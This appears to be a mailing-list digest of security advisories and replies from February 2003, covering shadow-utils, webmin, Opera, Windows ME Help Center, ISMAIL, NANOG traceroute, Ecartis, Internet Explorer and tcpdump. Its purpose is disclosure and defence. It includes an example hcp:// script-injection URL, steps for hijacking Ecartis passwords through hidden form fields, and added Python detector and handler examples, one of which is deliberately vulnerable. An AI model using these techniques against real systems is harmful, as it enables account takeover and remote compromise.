MDKSA-2003:026 - Updated shadow-utils packages fix improper mailspool ownership

2003-02-27 Thread Mandrake Linux Security Team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Mandrake Linux Security Update Advisory


Package name:       shadow-utils
Advisory ID:        MDKSA-2003:026
Date:               February 26th, 2003

Affected versions:  8.1, 8.2, 9.0, Multi Network Firewall 8.2


Problem Description:

 The shadow-utils package contains the tool useradd, which is used to 
 create or update new user information.  When useradd creates an
 account, it would create it with improper permissions; instead of
 having it owned by the group mail, it would be owned by the user's
 primary group.  If this is a shared group (i.e. "users"), then all
 members of the shared group would be able to obtain access to the
 mail spools of other members of the same group.  A patch to useradd
 has been applied to correct this problem.


References:
  
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1509


Updated Packages:
  


Bug IDs fixed (see https://qa.mandrakesoft.com for more information):


To upgrade automatically, use MandrakeUpdate.  The verification of md5
checksums and GPG signatures is performed automatically for you.

If you want to upgrade manually, download the updated package from one
of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm".  A list of
FTP mirrors can be obtained from:

  http://www.mandrakesecure.net/en/ftp.php

Please verify the update prior to upgrading to ensure the integrity of
the downloaded package.  You can do this with the command:

  rpm --checksig 

All packages are signed by MandrakeSoft for security.  You can obtain
the GPG public key of the Mandrake Linux Security Team from:

  https://www.mandrakesecure.net/RPM-GPG-KEYS

Please be aware that sometimes it takes the mirrors a few hours to
update.

You can view other update advisories for Mandrake Linux at:

  http://www.mandrakesecure.net/en/advisories/

MandrakeSoft has several security-related mailing list services that
anyone can subscribe to.  Information on these lists can be obtained by
visiting:

  http://www.mandrakesecure.net/en/mlist.php

If you want to report vulnerabilities, please contact

  security@linux-mandrake.com

Type Bits/KeyID Date   User ID
pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  

Re: Secunia Research: Opera browser Cross Site Scripting

2003-02-27 Thread Axel Beckert - ecos gmbh
Hi!

On Wed, Feb 26, 2003 at 04:00:55PM +0100, Jakob Balle wrote:
> ==
> 2) Affected Software
> 
> Following have been tested and found vulnerable:
> Opera prior to 7.02 on Windows
> [...]
> 
> ==
> 5) Solution
> 
> Vendor patch:
> Windows: Update to latest version. Opera v7.02 is not vulnerable.
> Linux: No update available.
> [...]
> 
> ==
> 6) Time Table
> 
> 15/02/2003 - Vulnerability discovered
> 16/02/2003 - Further research
> 17/02/2003 - Vendor informed
> 19/02/2003 - Vendor confirmed and fixed vulnerability
> 26/02/2003 - Vendor released Opera v7.02
> 26/02/2003 - Public disclosure of vulnerability

Please note that the Opera "Bork Edition", released on 14-Feb-2003,
calls itself on the "opera:about" page also "Opera 7.02" (build number
is "2658 Bork Edition"), but _is_ vulnerable. (Not tested, but it has
been released before the vulnerability was discovered... :-)

Kind regards, Axel Beckert
-- 
--
Axel Beckert   ecos electronic communication services gmbh
IT security solutions * dynamic web applications * consulting

Post:   Tulpenstrasse 5  D-55276 Dienheim b. Mainz
E-Mail: [EMAIL PROTECTED]  Voice:   +49 6133 939-220
WWW:http://www.ecos.de/  Fax: +49 6133 939-333
--


Re: Netscape 6/7 crashes by a simple stylesheet...

2003-02-27 Thread Greg Steuck
Yes, it had been known for a while. Searching for "style overflow
scroll" in bugzilla brings up a list of bug reports.

So, instead of posting to bugtraq you could have added a note to one of
those bug reports. Then again, posting here might put some pressure on
mozilla developers, who knows?

> "jux" == jux <[EMAIL PROTECTED]> writes:

jux> I've found out that some simple CSS-code can crash Netscape 6
jux> and 7.

jux> This is a simple html-page containing this code:

jux>   
jux>  
jux> 

jux> Was this already known?



MS-Windows ME IE/Outlook/HelpCenter critical vulnerability

2003-02-27 Thread Fozzy
--[ Summary ]-- 

From the Microsoft Security Bulletin MS03-006:
" A security vulnerability is present in the Windows Me version of Help
and Support Center [...]. An attacker could exploit the vulnerability by
constructing a URL that, when clicked on by the user, would execute code
of the attacker's choice in the Local Computer security context. The URL
could be hosted on a web page, or sent directly to the user in email. "
This issue can also be triggered automatically in some cases, without the
need for the victim to click on a link. It leads to total remote compromise of
the victim's computer.
 
Microsoft rates this issue as "Critical".


--[ Affected Systems ]--

- Windows ME (any version)
- Windows XP without SP1

Not vulnerable :
- Windows XP with SP1

Status of Windows 2000 was not tested but is believed to be the same as
Windows XP.


--[ Details]-- 

When a URL beginning with hcp:// is opened in Internet Explorer or
Outlook, the Help Center is launched. The URL is supplied to this
application without any additional check. The Help Center will handle
the URL by opening the specified HTML help page (which is on the local
computer). Arguments, like the help topic name, can be given in the URL
and will be handled by JavaScript code in the HTML page.

What happens if the victim follows this kind of link?
  hcp://vulnerable_help_page.htm?topic=javascript:alert('Malicious
script here can read, delete and execute any file')
The malicious topic we supplied will be used internally by scripts on
the page, will be inserted into the page, etc. So, the malicious script
will finally be executed in the Local Computer zone.

Exploitation has been confirmed on Windows ME and Windows XP without
SP1. When the malicious URL is opened in IE or Outlook, the Help
Center fires and executes the script crafted into the URL. Privileged
script actions and ActiveX controls can be run without any warning.
That allows an attacker to take total control over the victim's
computer.

We believe the Microsoft Security Bulletin issued about this issue is a
bit misleading. The problem was flagged as an "unchecked buffer in the
hcp:// URL handler leading to a buffer overrun vulnerability". We asked
Microsoft if they fixed a different problem than the one we reported,
but they told us it was the same.
We see it as a cross-site scripting vulnerability allowing an attacker
to execute arbitrary scripts in the relaxed security context of the Help
Center. This is much easier to exploit than a classical buffer overrun.
An attacker does not need to craft assembler code into the URL to
exploit this bug, he only needs to know a bit about client side
scripting languages and work around a weird triple-URL-decoding.


--[ Disclosure Timeline ]-- 

- "Warning" from The Hackademy Audit team found this vulnerability at the
end of November, 2002.
- Microsoft was notified early December.
- Readers of "The Hackademy Journal" were warned early December of
critical security issues in Windows ME and KDE (www.kde.org)
- KDE fixed its vulnerabilities early January. 
- Microsoft fixed the Windows ME issue at the end of February (26/02)


--[ Solution ]-- 

Apply the patch provided by Microsoft in Security Bulletin MS03-006:
http://www.microsoft.com/technet/security/bulletin/MS03-006.asp


-- Fozzy 

The Hackademy School, Journal & Audit  - Paris
http://www.thehackademy.net
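A gateway-side check for the link shape discussed in this post, written for this digest as an added example (it is not Fozzy's or Microsoft's code): it decodes each query parameter of an hcp:// link up to three times, mirroring the triple URL decoding the post mentions, and flags a parameter that resolves to a script: URL or is nested more deeply than that. MAX_DECODES, SCRIPT_SCHEMES, the regex and the sample message body are my assumptions.

```python
"""Flag hcp:// links whose query parameters smuggle script.

Added example for the Help Center issue described above; it is not code
from the post or from Microsoft. It decodes parameter values repeatedly
(MAX_DECODES is an assumption drawn from the "triple-URL-decoding" remark)
and reports links that a mail or web gateway should hold for review.
"""
import re
from urllib.parse import unquote, urlsplit

MAX_DECODES = 3                       # assumed: matches the post's remark
SCRIPT_SCHEMES = ("javascript:", "vbscript:")
HCP_LINK = re.compile(r"hcp://[^\s\"'<>]+", re.IGNORECASE)


def decode_times(value: str, rounds: int) -> str:
    """Percent-decode `value` up to `rounds` times, stopping once it is stable."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def _normalise(value: str) -> str:
    # Browsers ignore embedded tab/CR/LF and leading blanks in a scheme name,
    # so strip them before comparing against SCRIPT_SCHEMES.
    return re.sub(r"[\t\r\n]", "", value).lstrip().lower()


def classify_hcp_url(url: str) -> dict:
    """Return {"hcp": bool, "suspicious": bool, "reason": str} for one URL."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "hcp":
        return {"hcp": False, "suspicious": False, "reason": "not an hcp: URL"}
    for pair in parts.query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        once = decode_times(raw, 1)
        fully = decode_times(raw, MAX_DECODES)
        value = _normalise(fully)
        if value.startswith(SCRIPT_SCHEMES) or "<script" in value:
            return {"hcp": True, "suspicious": True,
                    "reason": f"parameter {name!r} resolves to script"}
        if once != raw and fully != once:
            # Still changing after the first decode: nested encoding, which a
            # legitimate help-topic name never needs.
            return {"hcp": True, "suspicious": True,
                    "reason": f"parameter {name!r} is percent-encoded more than once"}
    return {"hcp": True, "suspicious": False, "reason": "plain help-topic parameters"}


def find_suspicious_links(text: str) -> list:
    """Scan a message body; return (link, reason) for every flagged hcp:// link."""
    hits = []
    for match in HCP_LINK.finditer(text):
        verdict = classify_hcp_url(match.group(0))
        if verdict["suspicious"]:
            hits.append((match.group(0), verdict["reason"]))
    return hits


# Constructed sample message body (not taken from the post).
SAMPLE_BODY = """\
Help is at hcp://system/help.htm?topic=networking and the update notes are
at http://example.invalid/notes. Ignore hcp://system/help.htm?topic=%256Aavascript%3Aalert(1)
"""
```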


ISMAIL (All Versions) Remote Buffer Overrun

2003-02-27 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory

Name:             ISMAIL v 1.25 & v 1.4.3 Remote Buffer Overrun
Systems Affected: WinNT, Win2K, XP
Severity:         High Risk
Category:         Remote Buffer Overrun
Vendor URL:       http://instantservers.com/ismail.html
Author:           Mark Litchfield ([EMAIL PROTECTED])
Date:             27th February 2003
Advisory number:  #NISR27022003


Vendor Description
**

ISMail is a powerful yet easy to use mail server for Windows
95/98/ME/NT/2000 & XP.  It supports complete email service for both home and
office use, and runs on a dedicated or a shared machine.


Details
***

There exists a buffer overrun vulnerability in the SMTP service offered by
ISMAIL.  By supplying long Domain name values in either the MAIL FROM: or
RCPT TO: values, an attacker can overwrite the saved return address
on the stack.  As ISMAIL runs as a LOCALSYSTEM account, any arbitrary code
executed on the server being passed by an attacker will run with system
privileges.  If no code is supplied, ISMAIL will simply crash leaving a file
in the outgoing message folder which will immediately trigger the error once
ISMail is restarted.

Fix Information
***
The vendor has fixed the problems using the following:

ISMail 1.4.5 (and subsequent versions) accept domain names up to 255
characters in length. Domain names exceeding this length in the 'mail from'
and 'rcpt to' commands will result in a response of: '501 Syntax error in
parameters'.
Further, SMTP 'mail from' and 'rcpt to' command lines exceeding 1024
characters (including the CRLF) will result in a response of: '500 Line too
long'.

The fix is available from http://instantservers.com/download/ism145.exe
Although this is a BETA release, if you are running ISMAIL version 1.4.3 or
below, NGS recommend upgrading to the BETA version to protect yourself from
possible attacks.

I would like to add that the vendors of ISMAIL reproduced, fixed and made a
patch available within 48 hours of notification.

A check for these issues has been added to Typhon II, of which more
information is available from the
NGSSoftware website, http://www.ngssoftware.com.

Further Information
***

For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf
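The two limits the advisory quotes for ISMail 1.4.5, as an added example written for this digest (not the vendor's code): a checker that rejects an over-long command line before parsing it and an over-long domain after parsing the mailbox, returning the replies the advisory lists. The "250 OK" and "500 ... command unrecognized" replies, the regex and the CRLF rule are my assumptions.

```python
"""Parameter length limits for SMTP MAIL FROM / RCPT TO.

Added example modelled on the ISMail 1.4.5 fix described above; it is not
the vendor's code. It enforces the two limits the advisory states (a
255-character domain and a 1024-byte command line including CRLF) and
returns the replies the advisory quotes. The "250" and "500 ...
unrecognized" replies are assumptions, since the advisory does not list them.
"""
import re

MAX_LINE_BYTES = 1024   # whole command line, CRLF included (from the advisory)
MAX_DOMAIN_LEN = 255    # domain part of the mailbox (from the advisory)
COMMAND = re.compile(r"^(MAIL FROM|RCPT TO):\s*<([^<>]*)>\s*$", re.IGNORECASE)


def check_smtp_command(line: bytes) -> str:
    """Return the reply a hardened server sends for one raw command line.

    The line-length check runs before any parsing, so an oversized line is
    rejected without its contents ever being copied into a parsing buffer;
    that ordering is the point of the fix.
    """
    if len(line) > MAX_LINE_BYTES:
        return "500 Line too long"
    if not line.endswith(b"\r\n"):
        return "501 Syntax error in parameters"   # assumption: bare LF rejected
    text = line[:-2].decode("ascii", errors="replace")
    match = COMMAND.match(text)
    if match is None:
        verb = text.split(":", 1)[0].strip().upper()
        if verb in ("MAIL FROM", "RCPT TO"):
            return "501 Syntax error in parameters"
        return "500 Syntax error, command unrecognized"   # assumption
    verb, mailbox = match.group(1).upper(), match.group(2)
    if mailbox == "":
        # An empty reverse-path (bounce messages) is legal for MAIL FROM only.
        return "250 OK" if verb == "MAIL FROM" else "501 Syntax error in parameters"
    local, sep, domain = mailbox.rpartition("@")
    if not sep or not local or not domain:
        return "501 Syntax error in parameters"
    if len(domain) > MAX_DOMAIN_LEN:
        return "501 Syntax error in parameters"
    return "250 OK"


def build_command(verb: str, local: str, domain: str) -> bytes:
    """Assemble a command line; used to construct inputs for the checks."""
    return f"{verb}:<{local}@{domain}>\r\n".encode("ascii")
```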



[SECURITY] [DSA 254-1] New NANOG traceroute packages fix buffer overflow

2003-02-27 Thread Martin Schulze
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --
Debian Security Advisory DSA 254-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 27th, 2003 http://www.debian.org/security/faq
- --

Package: traceroute-nanog
Vulnerability  : buffer overflow
Problem-Type   : local, remote
Debian-specific: no
CVE Id : CAN-2002-1051 CAN-2002-1364 CAN-2002-1386 CAN-2002-1387
BugTraq Id : 4956 6166 6274 6275

A vulnerability has been discovered in NANOG traceroute, an enhanced
version of the Van Jacobson/BSD traceroute program.  A buffer overflow
occurs in the 'get_origin()' function.  Due to insufficient bounds
checking performed by the whois parser, it may be possible to corrupt
memory on the system stack.  This vulnerability can be exploited by a
remote attacker to gain root privileges on a target host.  Though,
most probably not in Debian.

The Common Vulnerabilities and Exposures (CVE) project additionally
identified the following vulnerabilities which were already fixed in
the Debian version in stable (woody) and oldstable (potato) and are
mentioned here for completeness (and since other distributions had to
release a separate advisory for them):

 * CAN-2002-1364 (BugTraq ID 6166) talks about a buffer overflow in
   the get_origin function which allows attackers to execute arbitrary
   code via long WHOIS responses.

 * CAN-2002-1051 (BugTraq ID 4956) talks about a format string
   vulnerability that allows local users to execute arbitrary code via
   the -T (terminator) command line argument.

 * CAN-2002-1386 talks about a buffer overflow that may allow local
   users to execute arbitrary code via a long hostname argument.

 * CAN-2002-1387 talks about the spray mode that may allow local users
   to overwrite arbitrary memory locations.

Fortunately, the Debian package drops privileges quite early after
startup, so those problems are not likely to result in an exploit on a
Debian machine.

For the current stable distribution (woody) the above problem has been
fixed in version 6.1.1-1.2.

For the old stable distribution (potato) the above problem has been
fixed in version 6.0-2.2.

For the unstable distribution (sid) these problems have been fixed in
version 6.3.0-1.

We recommend that you upgrade your traceroute-nanog package.

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.



Ecartis Password Resetting Vulnerability

2003-02-27 Thread Haluk AYDIN


Hi,

I don't know if someone has discovered this before but Ecartis 1.0.0 
(former listar) contains a vulnerability that enables an attacker to reset 
passwords of any user defined on the list server, including the list 
admins. 

After logging on as a non-privileged user, Ecartis enables the user to 
change his/her password, but does not ask for the old one. The first time 
I have seen this, I thought that the software relies on the session 
cookie, but it seems this is not the case. 

The html page contains the username in the "hidden" fields. After saving 
the page on disk, then replacing all "hidden" fields with another username 
which is defined in the server, and reloading the page again we can try 
our chance to change the password. Just fill in the empty password fields 
with a password of your choice, and click "Change Password": there you 
are... You have just reset the victim's password.

I have not tested this on different versions, but I guess it will work for 
all of them. I would appreciate any comments on the issue.

Regards,
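The flaw reported above, side by side with its fix, as an added example written for this digest (it is not Ecartis code): an in-memory user store and session table stand in for the list server; the vulnerable handler takes the account to modify from the form's hidden field, the hardened one takes it from the authenticated session and demands the current password first. All names, the PBKDF2 parameters and the demo scenario are my assumptions.

```python
"""Password change bound to the session, not to a hidden form field.

Added example illustrating the Ecartis report above; it is not Ecartis code.
An in-memory user store and session table stand in for the list server.
`change_password_vulnerable` takes the account to modify from the form, as
the post describes; `change_password_fixed` takes it from the authenticated
session and verifies the current password before changing anything.
"""
import hashlib
import hmac
import os
import secrets

PBKDF2_ROUNDS = 100_000   # assumption: any slow password hash would do


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class UserStore:
    """Maps username -> (salt, password hash)."""

    def __init__(self):
        self._users = {}

    def set_password(self, name: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[name] = (salt, _hash(password, salt))

    def verify(self, name: str, password: str) -> bool:
        record = self._users.get(name)
        if record is None:
            return False
        salt, digest = record
        return hmac.compare_digest(digest, _hash(password, salt))


class Sessions:
    """Maps an unguessable cookie -> the username that authenticated."""

    def __init__(self):
        self._by_cookie = {}

    def login(self, store: UserStore, name: str, password: str):
        if not store.verify(name, password):
            return None
        cookie = secrets.token_hex(16)
        self._by_cookie[cookie] = name
        return cookie

    def user_for(self, cookie: str):
        return self._by_cookie.get(cookie)


def change_password_vulnerable(store, sessions, cookie, form) -> str:
    # The session only gates access; WHICH account changes comes from the
    # form's hidden "username" field, which the client can rewrite at will.
    if sessions.user_for(cookie) is None:
        return "403 not logged in"
    if form["password1"] != form["password2"]:
        return "400 passwords differ"
    store.set_password(form["username"], form["password1"])   # the flaw
    return "200 password changed"


def change_password_fixed(store, sessions, cookie, form) -> str:
    user = sessions.user_for(cookie)
    if user is None:
        return "403 not logged in"
    if form.get("username", user) != user:
        # Worth logging: the client tampered with the hidden field.
        return "403 username does not match session"
    if not store.verify(user, form.get("old_password", "")):
        return "403 current password incorrect"
    if form["password1"] != form["password2"]:
        return "400 passwords differ"
    store.set_password(user, form["password1"])
    return "200 password changed"


def demo() -> dict:
    """Constructed scenario: a plain member submits a form naming the admin."""
    store, sessions = UserStore(), Sessions()
    store.set_password("listadmin", "admin-secret")
    store.set_password("member", "member-secret")
    cookie = sessions.login(store, "member", "member-secret")
    tampered = {"username": "listadmin", "password1": "pwned", "password2": "pwned"}

    vuln_reply = change_password_vulnerable(store, sessions, cookie, tampered)
    admin_hijacked = store.verify("listadmin", "pwned")

    store.set_password("listadmin", "admin-secret")       # reset for the second run
    fixed_reply = change_password_fixed(store, sessions, cookie, tampered)
    admin_intact = store.verify("listadmin", "admin-secret")
    return {"vulnerable": vuln_reply, "admin_hijacked": admin_hijacked,
            "fixed": fixed_reply, "admin_intact": admin_intact}
```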


Re: Netscape 6/7 crashes by a simple stylesheet...

2003-02-27 Thread Frankie
This looks like http://bugzilla.mozilla.org/show_bug.cgi?id=189118

Tested Jocke's page on Mozilla for MacOS X. Worked fine, no effect.
 The top command said Mozilla was using under 2% of my CPU.

Jocke wrote:
>> 
>> 
>>  
>>
>>  
>>
>>  
>>  
>> 
>> 

-- 
Francis Uy, Web Coordinator http://cty.jhu.edu/cde/ 410-516-0162


MDKSA-2003:025 - Updated webmin packages fix session ID spoofing vulnerability

2003-02-27 Thread Mandrake Linux Security Team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Mandrake Linux Security Update Advisory


Package name:       webmin
Advisory ID:        MDKSA-2003:025
Date:               February 26th, 2003

Affected versions:  7.2, 8.0, 8.1, 8.2, 9.0,
Single Network Firewall 7.2


Problem Description:

 A vulnerability was discovered in webmin by Cintia M. Imanishi, in the
 miniserv.pl program, which is the core server of webmin.  This
 vulnerability allows an attacker to spoof a session ID by including
 special metacharacters in the BASE64 encoding string used during the
 authentication process.  This could allow an attacker to gain full
 administrative access to webmin.
 
 MandrakeSoft encourages all users to upgrade immediately.


References:
  
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0101
  http://marc.theaimsgroup.com/?l=webmin-announce&m=104587858408101&w=2


Updated Packages:
  


Bug IDs fixed (see https://qa.mandrakesoft.com for more information):


To upgrade automatically, use MandrakeUpdate.  The verification of md5
checksums and GPG signatures is performed automatically for you.

If you want to upgrade manually, download the updated package from one
of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm".  A list of
FTP mirrors can be obtained from:

  http://www.mandrakesecure.net/en/ftp.php

Please verify the update prior to upgrading to ensure the integrity of
the downloaded package.  You can do this with the command:

  rpm --checksig 

All packages are signed by MandrakeSoft for security.  You can obtain
the GPG public key of the Mandrake Linux Security Team from:

  https://www.mandrakesecure.net/RPM-GPG-KEYS

Please be aware that sometimes it takes the mirrors a few hours to
update.

You can view other update advisories for Mandrake Linux at:

  http://www.mandrakesecure.net/en/advisories/

MandrakeSoft has several security-related mailing list services that
anyone can subscribe to.  Information on these lists can be obtained by
visiting:

  http://www.mandrakesecure.net/en/mlist.php

If you want to report vulnerabilities, please contact

  security@linux-mandrake.com

Type Bits/KeyID Date   User ID
pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  

Re: poc zlib sploit just for fun :)

2003-02-27 Thread Ralf S. Engelschall

In article <[EMAIL PROTECTED]> you wrote:

> [...]
> Attached below is a patch RK and I whipped up yesterday, after I 
> caught wind of this problem sometime in the afternoon.
> [...]

Thanks for your efforts. We've reviewed your patch for inclusion into
our OpenPKG "zlib" package and discovered that your configure checks are
not quite correct. For instance, you're incorrectly putting a va_list
variable into a snprintf call in one check, etc. Additionally we've
stripped down in size the patch to gzio.c (you re-formatted existing
code, etc). See http://cvs.openpkg.org/openpkg-src/zlib/zlib.patch for
our derived version of your patch in case you're interested.

   Ralf S. Engelschall
   [EMAIL PROTECTED]
   www.engelschall.com



Re: Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part II

2003-02-27 Thread D'Amato Luigi
Confirm on 6.0.2800.1106

On my IE is present: SP1, q324929, q810847, q813951

D'Amato Luigi
Admin www.securitywireless.info
----- Original Message -----
From: "Dike" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, February 25, 2003 1:50 PM
Subject: RE: Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part II


> Confirmed on IE 5.0 too :(
> 
> Sorry One Liner,
> Dike
> 
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> > Sent: Wednesday, February 26, 2003 4:45 AM
> > To: [EMAIL PROTECTED]
> > Subject: Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part II
> > Tuesday, February 25, 2003 
> > 
> > We are delighted to learn that the original self-executing html file, 
> > from June 1 2002 is now fixed with the most current of the many 
> > patches for the Internet Explorer series of browsers. See:
> > 
> > http://online.securityfocus.com/archive/1/275126
> > 
> > Regrettably.
> > 
> > The following file is an html file comprising both scripting and an 
> > executable [*.exe]. 
> > 
> > We inject scripting and an executable into the html file which is 
> > designed to point back to the executable in the html file and execute 
> > it. Provided the html file is an html file, Internet Explorer 5.5 and 
> > 6.0 will execute it. 
> > 
> > Because it is an html file proper, Internet Explorer opens it. The 
> > scripting inside is then parsed and fired. That scripting is pointing 
> > back to the same executable file with our original codebase object 
> > from the year 2000 and because it is a self-executing html file, it 
> > executes ! 
> > 
> > Tested IE5.5 and IE6. Fully self-contained harmless *.exe:
> > 
> > http://www.malware.com/html.exe.zip 
> > 
> > Be aware of html files out there. 
> > 
> > Key Words: Trust it's Worthy so Think it's Tank silly obvious 
> >  
> > -- 
> > http://www.malware.com
> 
> 
> 


Re: [VSA0307] Battlefield 1942 remote DoS

2003-02-27 Thread VOID.AT Security
> Overview
> 
>
> By sending a specially crafted packet to the bf1942-server
> remote administration port, an attacker can cause the server
> to crash.

After getting some reports, it seems that only servers
running on Windows XP are vulnerable. Can someone
confirm this?

greuff



Buffer Overrun Vulnerability in /sbin/ps on IRIX

2003-02-27 Thread SGI Security Coordinator
-----BEGIN PGP SIGNED MESSAGE-----

__
  SGI Security Advisory

Title: Buffer Overrun Vulnerability in /sbin/ps
Number   : 20030202-01-I
Date : February 26, 2003
Reference: CVE-1999-0301
Reference: SGI BUG 696723
Fixed in : IRIX 6.5.5 or later
__

- ---
- --- Issue Specifics ---
- ---

It has been reported that there was a potential buffer overrun vulnerability
in the /sbin/ps program.  This could result in a user with a local account
gaining privileged access.

For more information, see:
ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2003-SCO.1.1/CSSA-2003-SCO.1.1.txt
and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0301


SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in IRIX 6.5.5 and later.


- --
- --- Impact ---
- --

The /sbin/ps binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.base.

To determine the version of IRIX you are running, execute the following
command:

  # /bin/uname -R

That will return a result similar to the following:

  # 6.5 6.5.16f

The first number ("6.5") is the release name, the second ("6.5.16f" in this
case) is the extended release name.  The extended release name is the
"version" we refer to throughout this document.


- 
- --- Temporary Workaround ---
- 

There is no effective workaround available for this problem.
SGI recommends upgrading to IRIX 6.5.5 or later.


- 
- --- Solution ---
- 

SGI has not provided patches for this vulnerability. Our recommendation
is to upgrade to IRIX 6.5.5 or later.

   OS Version     Vulnerable?     Patch #     Other Actions
   ----------     -----------     -------     -------------
   IRIX 3.x       unknown                     Note 1
   IRIX 4.x       unknown                     Note 1
   IRIX 5.x       unknown                     Note 1
   IRIX 6.0.x     unknown                     Note 1
   IRIX 6.1       unknown                     Note 1
   IRIX 6.2       unknown                     Note 1
   IRIX 6.3       unknown                     Note 1
   IRIX 6.4       unknown                     Note 1
   IRIX 6.5       yes                         Notes 2 & 3
   IRIX 6.5.1     yes                         Notes 2 & 3
   IRIX 6.5.2     yes                         Notes 2 & 3
   IRIX 6.5.3     yes                         Notes 2 & 3
   IRIX 6.5.4     yes                         Notes 2 & 3
   IRIX 6.5.5     no
   IRIX 6.5.6     no
   IRIX 6.5.7     no
   IRIX 6.5.8     no
   IRIX 6.5.9     no
   IRIX 6.5.10    no
   IRIX 6.5.11    no
   IRIX 6.5.12    no
   IRIX 6.5.13    no
   IRIX 6.5.14    no
   IRIX 6.5.15    no
   IRIX 6.5.16    no
   IRIX 6.5.17    no
   IRIX 6.5.18    no

   NOTES

 1) This version of the IRIX operating system has been retired. Upgrade to an
actively supported IRIX operating system.
See http://support.sgi.com/ for more information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/

 3) Upgrade to IRIX 6.5.5 or later


- 
- --- Acknowledgments 
- 

SGI wishes to thank cve.mitre.org, Sun Microsystems, SCO, and the users of
the Internet Community at large for their assistance in this matter.


- -
- --- Links ---
- -

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/patches/

SGI patches for IRIX can be found at the following patch servers:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/

SGI freeware updates for IRIX can be found at:
http://freeware.sgi.com/

SGI fixes for SGI open sourced code can be found on:
http://oss.sgi.com/projects/

SGI patches and RPMs for Linux can be found at:
http://support.sgi.com/linux/ or
http://oss.sgi.com/projects/sgilinux-combined/download/security-fixes/

SGI patches for Windows NT or 2000 can be found at:
http://support.sgi.com/nt/

IRIX 5.2-6.4 Recommended/Required Patch Sets can be found at:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/support/patchset/

IRIX 6.5 Maintenance Release Streams can be found at:
http://support.sgi.com/colls/patches/tools/relstream/index.html

IRIX 6.5 Software Update CDs can be obtained from:
http://support.sgi.com/irix/swupdates/

The primary SGI anonym

SuSE Security Announcement: hypermail (SuSE-SA:2003:0012)

2003-02-27 Thread Thomas Biege
-----BEGIN PGP SIGNED MESSAGE-----

__

SuSE Security Announcement

Package:hypermail
Announcement-ID:SuSE-SA:2003:0012
Date:   Thursday, Feb 27th 2003 18:30 MET
Affected products:  7.1, 7.2, 7.3, 8.0, 8.1
Vulnerability Type: remote system compromise
Severity (1-10):4
SuSE default package:   no
Cross References:   CAN-2003-0025

Content of this advisory:
1) security vulnerability resolved: several bugs after source code
review
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
 - vnc
 - w3m
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

Hypermail is a tool to convert a Unix mail-box file to a set of cross-
referenced HTML documents.
During an internal source code review done by Thomas Biege several bugs
were found in hypermail and its tools. These bugs allow remote code
execution, local tmp race conditions, denial-of-service conditions and
read access to files belonging to the host hypermail is running on.
Additionally the mail CGI program can be abused by spammers as an email
relay and should thus be disabled.

There is no temporary fix known other than disabling hypermail. Please
download and install the new packages from our FTP servers.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.





__

2)  Pending vulnerabilities in SuSE Distributions and Workarounds:

  - vnc
   

iDEFENSE Security Advisory 02.27.03: TCPDUMP Denial of Service Vulnerability in ISAKMP Packet Parsing

2003-02-27 Thread iDEFENSE Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

iDEFENSE Security Advisory 02.27.03: 
http://www.idefense.com/advisory/02.27.03.txt
TCPDUMP Denial of Service Vulnerability in ISAKMP Packet Parsing
February 27, 2003

I. BACKGROUND

TCPDUMP is a widely used network debugging tool that prints out the
headers of packets on a network interface that match a boolean expression.
More information about the application is available at
http://www.tcpdump.org .  

II. DESCRIPTION

A vulnerability exists in the parsing of ISAKMP packets (UDP port 500)
that allows an attacker to force TCPDUMP into an infinite loop upon
receipt of a specially crafted packet. 

The following output is from TCPDUMP replaying a previously captured
malformed ISAKMP packet: 

# tcpdump -vvvr tcpdump_isakmp_inf_loop | head
05:14:57.954719 192.168.2.243.isakmp > 192.168.2.243.isakmp: isakmp 8.9 msgid 7d380dee
